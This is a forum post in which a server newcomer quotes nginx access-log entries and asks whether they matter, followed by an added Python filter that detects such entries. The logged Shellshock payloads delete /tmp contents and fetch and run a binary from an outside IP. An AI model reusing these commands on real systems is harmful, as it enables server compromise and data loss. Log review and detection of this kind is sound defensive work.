Suspicious log records

janro nginx-forum at forum.nginx.org
Sat Oct 22 10:19:54 UTC 2016


Hi everyone.

I'm a newbie with Nginx and with servers, and I thought I'd ask your opinion
about the log input I noticed from last night.

There's clearly some sort of malicious attempt in access.log which is
repeated four times. In error.log there are only 'closed keepalive connection'
records, which match those four attempts.

Everything runs fine on the server side. I'd just like to know whether this is
just a normal day in the world of server logs or something critical that needs
action?

Access.log

61.147.247.161 - - [22/Oct/2016:00:10:14 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo
/tmp/China.Z-axgfh >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
/tmp/China.Z-axgfh >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo
chmod 777 /tmp/China.Z-axgfh >> /tmp/Run.sh;echo /tmp/China.Z-axgfh >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
/tmp/Run.sh;/tmp/Run.sh\x22" "-"

61.147.247.161 - - [22/Oct/2016:00:11:08 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
/tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
/tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo
/tmp/China.Z-jshc\x98 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"

61.147.247.161 - - [22/Oct/2016:00:12:28 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
/tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O
/tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo
/tmp/China.Z-wbyb\xB0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "-"

61.147.247.161 - - [22/Oct/2016:00:13:29 +0300] "GET / HTTP/1.1" 301 184 "()
{ :; }; /bin/bash -c \x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1
-O /tmp/China.Z-xxmb  >> /tmp/Run.sh;echo echo By China.Z >>
/tmp/Run.sh;echo chmod 777 /tmp/China.Z-xxmb  >> /tmp/Run.sh;echo
/tmp/China.Z-xxmb  >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >>
/tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\x22" "() { :; }; /bin/bash -c
\x22rm -rf /tmp/*;echo wget http://123.249.7.198:8832/1 -O /tmp/China.Z-xxmb
 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777
/tmp/China.Z-xxmb  >> /tmp/Run.sh;echo /tmp/China.Z-xxmb  >>
/tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777
/tmp/Run.sh;/tmp/Run.sh\x22" "-"

Error.log

2016/10/22 00:10:15 [info] 1751#0: *27218 client 61.147.247.161 closed
keepalive connection
2016/10/22 00:11:09 [info] 1751#0: *27219 client 61.147.247.161 closed
keepalive connection
2016/10/22 00:12:29 [info] 1751#0: *27220 client 61.147.247.161 closed
keepalive connection
2016/10/22 00:13:29 [info] 1751#0: *27221 client 61.147.247.161 closed
keepalive connection

Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270472,270472#msg-270472
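
Added example, not part of the original post: a small Python filter that flags access-log lines like the ones above, where the request, Referer or User-Agent field contains a Bash function-definition prefix (`() {`), and groups them by client address together with the status codes nginx returned. The sample lines are constructed (documentation addresses, a harmless `echo` payload), and the function names are this example's own.

```python
import re

# nginx "combined" log line; nginx writes a literal " inside a field as \x22,
# so each quoted field can be matched as [^"]*. Extra trailing fields are ignored.
LINE_RE = re.compile(
    r'(?P<addr>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# Bash function-definition prefix with optional whitespace: "() {" or "(){"
FUNC_PREFIX_RE = re.compile(r'\(\)\s*\{')

def find_probes(lines):
    """Return one dict per line whose request, Referer or User-Agent has the prefix."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in combined format; skipped, not treated as clean
        fields = [f for f in ("request", "referer", "agent")
                  if FUNC_PREFIX_RE.search(m[f])]
        if fields:
            hits.append({"addr": m["addr"], "time": m["time"],
                         "status": int(m["status"]), "fields": fields})
    return hits

def summarize(hits):
    """Per client address: number of flagged requests and the statuses returned."""
    out = {}
    for h in hits:
        entry = out.setdefault(h["addr"], {"count": 0, "statuses": set()})
        entry["count"] += 1
        entry["statuses"].add(h["status"])
    return out

# Constructed sample lines (documentation addresses, harmless payload).
SAMPLE = [
    '192.0.2.10 - - [22/Oct/2016:00:10:14 +0300] "GET / HTTP/1.1" 301 184 '
    '"() { :; }; /bin/bash -c \\x22echo probe\\x22" "() { :; }; echo probe" "-"',
    '192.0.2.10 - - [22/Oct/2016:00:11:08 +0300] "GET / HTTP/1.1" 301 184 '
    '"-" "(){ :; }; echo probe" "-"',
    '203.0.113.5 - - [22/Oct/2016:00:12:00 +0300] "GET /index.html HTTP/1.1" '
    '200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)" "-"',
]

if __name__ == "__main__":
    for addr, info in summarize(find_probes(SAMPLE)).items():
        print(addr, info["count"], sorted(info["statuses"]))
```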


